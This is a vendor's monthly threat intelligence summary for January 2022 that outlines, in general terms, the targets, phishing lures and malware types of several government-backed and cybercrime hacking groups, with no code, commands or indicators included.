Monthly Threat Actor Group Intelligence Report, January 2022 (ENG)

This document is an overview of threat actor group activities as analyzed by NSHC ThreatRecon team, based on data and information collected since 21 December 2021 to 20 January 2022.

1. SectorA Activity Features

Activities by a total of 3 hacking groups were identified in January 2022, and these groups are SectorA02, SectorA05 and SectorA07 groups.

SectorA02 group was found to be active in South Korea. This group launched attacks targeted on workers in the field of North Korean policies, using phishing emails disguised as payment bills of credit card companies.

SectorA05 group was found to be active in South Korea and Bulgaria. The group distributed HWP format malwares disguised as documents related to North Korean policies.

SectorA07 group was found to be active in Russia. The group sent out spear phishing emails targeted on workers of a specific country’s government institutions and diplomats.

Hacking activities of SectorA hacking groups that continue to date aim to collect advanced information regarding South Korean governmental activities such as political, diplomatic activities, while targeting hacking activities on the whole world to secure financial resources at the same time. This aim for hacking activities has continued over a long period of time and is expected to be carried on without changes for some time.

2. SectorB Activity Features

Activities by a total of 2 hacking groups were identified in January 2022, and these groups are SectorB03 and SectorB43 groups.

SectorB03 group was found to be active in South Korea, the United States of America, China, England, Brazil, Hong Kong, Japan, and Serbia. The group used subjects that workers of the IT industry would be interested in, such as “Software Engineer”, “Maintenance Engineer”, “Resume”.

SectorB43 group was found to be active in Pakistan, India, Vietnam, Russia, and Japan. The group launched attacks targeted on a specific country’s private company for this activity.

Hacking activities of SectorB hacking groups that continue to date are seen to be aiming to collect advanced information on governmental activities such as political, diplomatic activities, and is targeted at the whole world.

3. SectorC Activity Features

Activities by a total of 1 hacking group was identified in January 2022, and these groups are SectorC08 group.

SectorC08 group was found to be active in Ukraine. The group used MS word document format malware that uses the template injection technique, which downloads PE (Portable Executable) malware in the target’s system and steals the system controls.

Hacking activities of SectorC hacking groups that continue to date are seen to be aiming to collect advanced information on governmental activities such as political, diplomatic activities, targeted at the whole world, including countries near the supporting government’s borders.

4. SectorD Activity Features

Activities by a total of 2 hacking groups were identified in January 2022, and these groups are SectorD02 and SectorD05 groups.

SectorD02 group was found to be active in Saudi Arabia, Russia, Iran, United States of America, Armenia, Turkey, Austria, and Germany. The group distributed malwares disguised as documents related to a workshop in a specific university in Arab Emirates and collected system information of the infected systems.

SectorD05 group took advantage of Log4j vulnerabilities, and used new PowerShell based backdoors such as CharmPower after penetrating the system to collect system information or seize system controls.

SectorD hacking groups mostly served hacking activities targeted on countries in political conflicts with supported government, and the group is recently seen to be collecting advanced information such as political, diplomatic activities of individuals or governments against the supporting government.

5. SectorE Activity Features

Activities by a total of 4 hacking groups were identified in January 2022, and these groups are SectorE01, SectorE02, SectorE04 and SectorE05 groups.

SectorE01 group was found to be active in China and Bulgaria. The group distributed RTF format malwares by disguising as a certain country’s governmental institution.

SectorE02 group was found to be active in Pakistan and Bangladesh. The group used Android malwares disguised as chat applications to avoid suspicion from users.

SectorE04 group was found to be active in Pakistan, England, Sri Lanka, and Singapore. The group used subjects such as “Pakistani Navy”, “Corona” to distribute MS word format malwares for their attacks.

SectorE05 group was found to be active in Pakistan, Bangladesh, England, and Hong Kong. The group sent out spear phishing emails targeted on polices.

Hacking activities of SectorE hacking groups that continue to date are seen to be aiming to collect advanced information regarding such as political, diplomatic, military activities. However, considering that they have expanded their targets to East Asian countries including China and other areas recently, it is analyzed that the proportion of hacking activities to collect advanced information related to politics, diplomacy, and technology from these countries have increased.

6. SectorH Activity Features

Activities by a total of 2 hacking groups were identified in January 2022, and these groups are SectorH01 and SectorH03 groups.

SectorH01 group was found to be active in Germany. The group used PowerPoint documents inserted with malicious macros in their attacks, that downloads additional malware in the target’s system and executes it to serve malicious functions.

SectorH03 group was found to be active in France, Sweden, Israel, Yemen, Belarus, Argentina, Palestine, Ukraine, Russia, Morocco, Netherlands, India, and Taiwan. The group used documents with various subjects such as procedures to selecting air force candidates, aerospace research institutions, and meeting notes for missile systems, for their attacks. When the document is executed, it downloads additional malware and executes them to collect system information, clipboard data, and screenshots.

Hacking activities of SectorH hacking group consists of cybercrime hacking activities and government supported hacking activities. Diplomatic clashes has been ongoing between the backing country and the bordering country, India, so it is analyzed that they will continue activities to collect advanced information regarding Indian government agencies’ military and politics to their need.

7. Cyber Crime Activity Features

A total of 6 hacking groups that carry out hacking activities online were identified this January 2022, and the groups are SectorJ03, SectorJ06, SectorJ09, SectorJ10, SectorJ20 and SectorJ26 groups.

Unlike other government-supported hacking groups, they steal online information of monetary value in the real world or directly hacks specific companies and organizations to distribute ransomware in their internal networks, or steal important industrial confidential information and threaten to demand ransom in return.

SectorJ03 group was found to be active in Spain, Palestine, China, Israel, and Jordan. The group used malwares targeted on Android platforms to steal information such as SMS data, photos, phone call recordings of the victims.

SectorJ06 group was found to be active in United States of America and Israel. The group used Diavol ransomware using the RSA encryption keys and added “.lock64” file extensions to the encrypted files.

SectorJ09 group continued using their hacking method of inserting obfuscated skimming scripts into websites to collect username, address, email, phone number and credit card payment information from the payment page. A JavaScript malware in identical format as those identified in previous activities were found.

SectorJ10 group was found to be active in United States of America. The group used a new ransomware named White Rabbit in their attacks targeted on American financial companies.

SectorJ20 group was identified in Germany. The group used LNK format files disguised as passports, which upon execution downloads and executes PDF files to avoid user suspicion, and downloads additional malwares to serve malicious functions such as information collection.

SectorJ26 group was found to be active in China, Bulgaria, Russia, the United States of America, Saudi Arabia, India, Azerbaijan, Germany, Japan, Spain, Norway, Britain, Turkey, Iran, Egypt, Canada, Georgia, Italy, Pakistan, Mexico, Vietnam, Lithuania, Libya, Sweden, Malaysia, Poland, the Netherlands, Colombia, France, Hong Kong, Ireland, Singapore, Morocco, Myanmar, Qatar, and Moldova. The group used MS word format malwares with macros inserted, which creates and executes scripts in hta format, which downloads backdoor malwares to steal system control.

The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net